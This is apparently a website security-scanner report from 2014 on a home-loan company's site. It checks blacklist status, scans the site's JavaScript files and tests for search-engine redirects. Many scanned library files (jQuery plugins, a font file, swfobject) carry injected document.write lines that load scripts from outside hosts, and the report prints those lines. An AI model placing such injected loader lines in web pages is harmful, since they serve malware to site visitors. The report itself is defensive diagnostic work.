Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=203k-loans-ct.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://203k-loans-ct.com/ | 200 OK Content-Length: 19157 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://7487.aqq.ru/fhxH9WLK.php?id=9713739"></script> | ||
http://203k-loans-ct.com/_include/js/jquery.js | 200 OK Content-Length: 77950 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161764"></script>'); | ||
http://203k-loans-ct.com/_include/js/jquery.badBrowser.js | 200 OK Content-Length: 1805 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161757"></script>'); | ||
http://203k-loans-ct.com/_include/js/jquery.tools.js | 200 OK Content-Length: 207 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161768"></script>'); | ||
http://203k-loans-ct.com/_include/js/jquery.easing.js | 200 OK Content-Length: 8269 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t b; }, easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) b; }, easeInOutQuad: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t b; retur } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t .9375) b; } else { return c*(7.5625*(t-=(2.625/2.75))*t .984375) b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 c*.5 b; } }); document.write('<img src="http://localhost/" >'); Antivirus reports:
| ||
http://203k-loans-ct.com/_include/js/cufon.js | 200 OK Content-Length: 39657 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161754"></script>'); | ||
http://203k-loans-ct.com/_include/js/Vera_400-Vera_700-Vera_oblique_400-Vera_oblique_700.font.js | 200 OK Content-Length: 181022 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161753"></script>'); | ||
http://203k-loans-ct.com/_include/js/jquery.prettyPhoto.js | 200 OK Content-Length: 29835 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161767"></script>'); | ||
http://203k-loans-ct.com/_include/js/jquery.hoverInt.js | 200 OK Content-Length: 3380 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){ $.fn.hoverIntent = function(f,g) { var cfg = { sensitivity: 7, interval: 100, timeout: 0 }; cfg = $.extend(cfg, g ? { over: f, out: g } : f ); var cX, cY, pX, pY; var track = function(ev) { cX = ev.pageX; cY = ev.pageY; }; var compare = function(ev,ob) { ob.hoverIntent_t = clearTimeout(ob.hoverIntent_t); if ( ( Math.abs(pX-cX) Math.abs(pY-cY) ) < cfg.sensitivi if (ob.hoverIntent_s != 1) { ob.hoverIntent_t = setTimeout( function(){compare(ev,ob);} , cfg.interval );} } else { $(ob).unbind("mousemove",track); if (ob.hoverIntent_s == 1) { ob.hoverIntent_t = setTimeout( function(){delay(ev,ob);} , cfg.timeout );} } }; return this.mouseover(handleHover).mouseout(handleHover); }; })(jQuery); document.write('<img src="http://localhost/" >'); Antivirus reports:
| ||
http://203k-loans-ct.com/_include/js/jquery.bgiframe.js | 200 OK Content-Length: 1931 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161758"></script>'); | ||
http://203k-loans-ct.com/_include/js/superfish.js | 200 OK Content-Length: 3906 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($){ $.fn.superfish = function(op){ var sf = $.fn.superfish, c = sf.c, $arrow = $(['<span class="',c.arrowClass,'"> »</span>'].join('')), over = function(){ var $$ = $(this), menu = getMenu($$); clearTimeout(menu.sfTimer); $$.showSuperfishUl().siblings().hideSuperfishUl(); }, out = function(){ var $$ = $(this), menu = getMenu($$), o = sf.op; clearTimeout(menu.sfTimer); men return this; }, showSuperfishUl : function(){ var o = sf.op, sh = sf.c.shadowClass '-off', $ul = this.addClass(o.hoverClass) .find('>ul:hidden').css('visibility','visible'); sf.IE7fix.call($ul); o.onBeforeShow.call($ul); $ul.animate(o.animation,o.speed,function(){ sf.IE7fix.call($ul); o.onShow.call($ul); }); return this; } }); })(jQuery); document.write('<img src="http://localhost/" >'); Antivirus reports:
| ||
http://203k-loans-ct.com/_include/js/swfobject.js | 200 OK Content-Length: 10425 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac= document.write('<img src="http://localhost/" >'); Antivirus reports:
| ||
http://203k-loans-ct.com/_include/js/jquery.captify.js | 200 OK Content-Length: 5749 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161759"></script>'); | ||
http://203k-loans-ct.com/_include/js/custom.js | 200 OK Content-Length: 2250 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161755"></script>'); | ||
http://203k-loans-ct.com/_include/js/jqplot/jquery.jqplot.js | 200 OK Content-Length: 298822 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=9713792"></script>'); |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 203k-loans-ct.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 Jun 2014 17:30:06 GMT
Accept-Ranges: bytes
Server: nginx/1.6.0
Content-Length: 19157
Content-Type: text/html
Last-Modified: Mon, 17 Mar 2014 22:15:31 GMT
...19157 bytes of data.
GET / HTTP/1.1
Host: 203k-loans-ct.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 Jun 2014 17:30:06 GMT
Accept-Ranges: bytes
Server: nginx/1.6.0
Content-Length: 19157
Content-Type: text/html
Last-Modified: Mon, 17 Mar 2014 22:15:31 GMT
...19157 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 203k-loans-ct.com
Referer: http://www.google.com/search?q=203k-loans-ct.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 203k-loans-ct.com
Referer: http://www.google.com/search?q=203k-loans-ct.com
Result:
The result is similar to the first query. There are no suspicious redirects found.